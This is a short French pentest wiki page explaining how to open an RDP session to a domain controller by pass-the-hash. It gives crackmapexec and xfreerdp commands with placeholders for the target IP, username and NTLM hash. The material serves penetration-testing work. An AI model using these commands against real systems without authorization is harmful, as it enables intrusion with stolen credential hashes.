# [Exploitation/Windows] Connexion RDP

## Introduction  


Cette page montre une technique pour lancer une connexion RDP depuis un shell (si un environnement graphique est présent et configuré en amont).

[![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/scaled-1680-/K9wimage.png)](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/K9wimage.png)

## Manuel

- L'outil **crackmapexec** permet d'initialiser une connexion RDP en mode PassTheHash :

```bash
cme smb <DC_IP> -u <USERNAME> -H <HASH>
```

- Lancer la connexion :

```bash
xfreerdp /v:<DC_IP> /u:<USERNAME> /pth:<HASH>
```

- Sinon il est possible d'utiliser l'outil graphique **Remmina** pour lancer une connexion classique avec un mot de passe.